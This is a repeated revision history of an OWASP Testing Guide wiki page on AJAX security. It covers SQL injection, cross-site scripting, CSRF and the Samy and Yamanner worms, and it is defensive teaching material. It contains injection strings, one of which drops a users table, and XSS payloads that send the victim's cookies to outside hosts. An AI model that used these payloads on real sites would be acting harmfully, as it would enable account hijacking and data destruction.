*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-09T23:15:51Z

Anushshetty: /* Black Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T19:10:32Z

Anushshetty: /* Testing Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T19:00:44Z

Anushshetty: /* Gray Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==

'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-06T18:59:49Z

Anushshetty: /* Black Box testing and example */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
